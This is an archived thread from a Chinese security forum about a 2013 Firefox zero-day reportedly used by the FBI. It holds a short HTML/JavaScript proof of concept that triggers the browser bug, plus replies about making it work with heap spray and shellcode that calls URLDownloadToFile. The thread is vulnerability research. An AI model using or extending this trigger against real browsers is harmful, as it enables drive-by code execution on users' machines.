BinVul's Archiver

instruder 发表于 2013-8-7 01:23

Firefox 0day (FBI Used in Child Porn Hunt)

见pdf

[attach]435[/attach] :(

instruder 发表于 2013-8-7 11:15

[code]// Save as iframe.html
<script>
  
  var z ="<body><img src='nonexistant.html' onerror=\"javascript: window.location.href='crash.html'\" ></body>"
  function a() {
   alert(3)
   window.stop();
   }
  function b()
  {

        window.parent.frames[0].frameElement.ownerDocument.write(z);
        setTimeout(b,1000);
  }
   setTimeout(b,1000);
   document.addEventListener("readystatechange",a,null);
</script>
[/code]这样的也是可行的 加强对这个漏洞理解

haha2012 发表于 2013-8-8 17:04

貌似不能触发呀

instruder 发表于 2013-8-8 22:40

20.1 版本可以

haha2012 发表于 2013-8-10 00:19

我在你的基础上,理由heapspray,可以执行shellcode,发现在执行shellcode时,firefox会阻止URLDownLoadToFile执行,或者说,这个函数无法正确执行,楼主可以指教下吗?谢谢!

bug9er 发表于 2013-9-2 11:44

ff 这个利用情况还真是特别啊

cloud4986 发表于 2014-2-27 12:50

多谢楼主!

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.